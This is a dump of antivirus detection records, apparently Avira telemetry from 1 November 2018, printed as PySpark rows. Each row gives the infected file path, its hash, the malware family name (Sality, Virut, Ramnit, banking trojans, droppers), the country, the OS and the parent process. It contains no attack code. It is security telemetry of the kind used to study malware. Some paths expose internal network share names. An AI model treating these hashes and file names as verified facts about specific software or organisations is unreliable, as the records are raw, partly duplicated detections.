  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-01_23-11-53\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='64a827e67aa8f53cf7679197a41a9005bd1c4b45ba2049d4b86aba7a82998c17', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-01T20:08:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='655779cbc38199fc88e3b913c7f9b85b4c32b00c67dee9cde97beca33d1419ca', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\655779CBC38199FC88E3B913C7F9B85B4C32B00C67DEE9CDE97BECA33D1419CA', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='655779cbc38199fc88e3b913c7f9b85b4c32b00c67dee9cde97beca33d1419ca', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:11:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-065612-0c47283f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_501d5ee2\\AVSCAN-20181101-065548-0759CFA3\\AVSCAN-20181101-065612-0C47283F', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='664af15df40e1f9e0ad1bb4be5b607d98da5a2ac74b51741e264eb792bd504ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:56:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='password_generator_2.0_setup.exe', filepath='H:\\software\\optimierung\\PASSWORD_GENERATOR_2.0_SETUP.EXE', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='664af15df40e1f9e0ad1bb4be5b607d98da5a2ac74b51741e264eb792bd504ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T05:54:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Windows\\System32\\DriverStore\\FileRepository\\hdart.inf_x86_neutral_19825fd7f8bfb7f8\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='66a1a8a6501bf73a145118d6843a4f9dd2a397035c65cbccc91422dc3dc394fa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Windows\\System32\\DriverStore\\FileRepository\\hdart.inf_x86_neutral_19825fd7f8bfb7f8\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='66a1a8a6501bf73a145118d6843a4f9dd2a397035c65cbccc91422dc3dc394fa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:38:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Windows\\System32\\DriverStore\\FileRepository\\hdart.inf_x86_neutral_19825fd7f8bfb7f8\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='66a1a8a6501bf73a145118d6843a4f9dd2a397035c65cbccc91422dc3dc394fa', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:14:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sdclt.exe', filepath='H:\\SDCLT.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='66c799f4772ee3a7ff59b13e76bd32994490b66034d5798a5d627b450a77212e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Baidu Security\\Baidu Antivirus\\5.4.3.124234.0\\BAVSvc.exe', parentsize=2572928, timestamp='2018-11-01T15:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sdclt.exe', filepath='H:\\SDCLT.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='66c799f4772ee3a7ff59b13e76bd32994490b66034d5798a5d627b450a77212e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Baidu Security\\Baidu Antivirus\\5.4.3.124234.0\\BAVSvc.exe', parentsize=2572928, timestamp='2018-11-01T10:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='672a928e442750d5eab66020ab3d94bb084984394ced6d55c4e382464b9066af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\672A928E442750D5EAB66020AB3D94BB084984394CED6D55C4E382464B9066AF', filesize=128000, name='WORM/Autorun.gjm.#M1.#R1'), hash='672a928e442750d5eab66020ab3d94bb084984394ced6d55c4e382464b9066af', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:05:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-051847-f2c494ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5773479\\AVSCAN-20181101-051717-E31C1ABE\\AVSCAN-20181101-051847-F2C494EF', filesize=512000, name='W32/Alman.BB.#M1.#R1'), hash='6761c9525bfcfe12e0ccc48dfc02c298b478e7e3e31eaeeef81dfdfaf324b62f', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:18:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='67d41aa654a042c9fdba9127538c263e8e153fcd2347c815a690dd30db380bda', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T02:39:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='67d41aa654a042c9fdba9127538c263e8e153fcd2347c815a690dd30db380bda', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T08:49:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='67d41aa654a042c9fdba9127538c263e8e153fcd2347c815a690dd30db380bda', metadata=Row(cmdline='\\\\\\/Embedding', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T02:34:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\67F10537268ACDFD45AA577EC35FB4AEA6F0880EE2957F243795D1D936079303', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:17:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='overseer.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\avast software\\overseer\\overseer.exe', filesize=1664000, name='W32/Sality.Patched.#M1.#R1'), hash='680994ce4d9dcb697b40aa51d62c5f3128c589b96e6c8720503b3d5e4484bebc', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='overseer.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\avast software\\overseer\\overseer.exe', filesize=1664000, name='W32/Sality.Patched.#M1.#R1'), hash='680994ce4d9dcb697b40aa51d62c5f3128c589b96e6c8720503b3d5e4484bebc', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='overseer.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\avast software\\overseer\\overseer.exe', filesize=1664000, name='W32/Sality.Patched.#M1.#R1'), hash='680994ce4d9dcb697b40aa51d62c5f3128c589b96e6c8720503b3d5e4484bebc', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synapse.exe', filepath='C:\\Users\\X\\Desktop\\Hax\\Bazynga - Synapse Dexin\\Synapse.exe', filesize=128000, name='HEUR/AGEN.1033386.#M1.#R1'), hash='680fa2eadd5464cccda41161a653055390ff65d1c43507fd554ee67ee66e9b0c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:25KnKkqcSEafTi\\\\\\/1.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:04:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122608-ffd9c7d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e841615\\AVSCAN-20181101-122516-F9C8D5E2\\AVSCAN-20181101-122608-FFD9C7D5', filesize=128000, name='TR/Dropper.qoskp.#M1.#R1'), hash='680fa2eadd5464cccda41161a653055390ff65d1c43507fd554ee67ee66e9b0c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chuuxwmr.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\yefcbqzo\\chuuxwmr.exe', filesize=11840000, name='TR/Crypt.XPACK.Gen8.#M1.#R1'), hash='68d4f5505110d33eb906307722a519d8f479634aa928fb5a5d3f468db257ebb1', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chuuxwmr.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\yefcbqzo\\chuuxwmr.exe', filesize=11840000, name='TR/Crypt.XPACK.Gen8.#M1.#R1'), hash='68d4f5505110d33eb906307722a519d8f479634aa928fb5a5d3f468db257ebb1', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartprintsetup.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\hourly.0\\Software\\OLD\\Drivers\\Printers\\HP 7500A\\OJ7500_E910\\Toolbar\\smartprintsetup.exe', filesize=964000, name='W32/Sality.Y.#M1.#R1'), hash='69045197271e1e1ecf56b9ce5725b995543eba63e5282c7023d9c1eb9f6332e5', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T09:33:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartprintsetup.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\nightly.0\\Software\\OLD\\Drivers\\Printers\\HP 7500A\\OJ7500_E910\\Toolbar\\smartprintsetup.exe', filesize=964000, name='W32/Sality.Y.#M1.#R1'), hash='69045197271e1e1ecf56b9ce5725b995543eba63e5282c7023d9c1eb9f6332e5', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T08:24:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartprintsetup.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\sv_daily.1\\Software\\OLD\\Drivers\\Printers\\HP 7500A\\OJ7500_E910\\Toolbar\\smartprintsetup.exe', filesize=964000, name='W32/Sality.Y.#M1.#R1'), hash='69045197271e1e1ecf56b9ce5725b995543eba63e5282c7023d9c1eb9f6332e5', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T11:39:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Windows.old.000\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='W32/Sality.AT.#M1.#R1'), hash='692c2963a14695f6eb91c8df765a1f678693b0030746a786ba5883a772d37fab', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T01:54:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_6.1.7600.16385_none_5ae7f926deb5de01\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='695401b52e416577f5c69c153b5bed69d7c47cfcc62e8e3b450c505dac8ed047', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-r..eak-diagnostic-core_31bf3856ad364e35_6.1.7600.16385_none_5ae7f926deb5de01\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='695401b52e416577f5c69c153b5bed69d7c47cfcc62e8e3b450c505dac8ed047', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c069697_cip (1).exe', filepath='C:\\Users\\X\\Downloads\\C069697_CIP (1).exe', filesize=3264000, name='HEUR/AGEN.1012080.#M1.#R1'), hash='69654e61c99fc6f174639055061f6b02c6a86592d763b0170c651affd89eae0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:12:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c069697_cip.exe', filepath='C:\\Users\\X\\Downloads\\C069697_CIP.exe', filesize=3264000, name='HEUR/AGEN.1012080.#M1.#R1'), hash='69654e61c99fc6f174639055061f6b02c6a86592d763b0170c651affd89eae0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:12:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c069697_cip (2).exe', filepath='C:\\Users\\X\\Downloads\\C069697_CIP (2).exe', filesize=3264000, name='HEUR/AGEN.1012080.#M1.#R1'), hash='69654e61c99fc6f174639055061f6b02c6a86592d763b0170c651affd89eae0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:12:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_00-09-39\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T18:40:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_00-09-39\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T18:40:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aamlauncher.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\UWA\\AAMLauncher.exe', filesize=524000, name='W32/Sality.AT.#M1.#R1'), hash='699f0ef2a4b2d24cfa7030112359ac670dc0b8016ba1d76c2630effef1570dc9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='69d1d191bce1095b1172de0e410288c21f9901d0ccfb9e4525135c1279a96e90', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\69D1D191BCE1095B1172DE0E410288C21F9901D0CCFB9E4525135C1279A96E90', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='69d1d191bce1095b1172de0e410288c21f9901d0ccfb9e4525135c1279a96e90', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 11 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 11 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 12 lançamento 2015 -=mp3=- - copy (12).exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 12 Lançamento 2015 -=Mp3=- - Copy (12).exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 03 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 03 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 10 lançamento 2015 -=mp3=- - copy (10).exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 10 Lançamento 2015 -=Mp3=- - Copy (10).exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 07 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 07 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 06 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 06 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='faixa 02 lançamento 2015 -=mp3=-.exe', filepath='C:\\Users\\X\\Documents\\Baixar,_Escutar_CD_Sorriso_Maroto_-_Eu_Gosto,_Ao_Vivo_No_Maracanãzinho_-_(2015)[1]\\Baixar, Escutar CD Sorriso Maroto - Eu Gosto, Ao Vivo No Maracanãzinho - (2015)\\FAIXA 02 Lançamento 2015 -=Mp3=-.exe', filesize=4800000, name='TR/Spy.Banker.Gen.#M300.#R2024'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
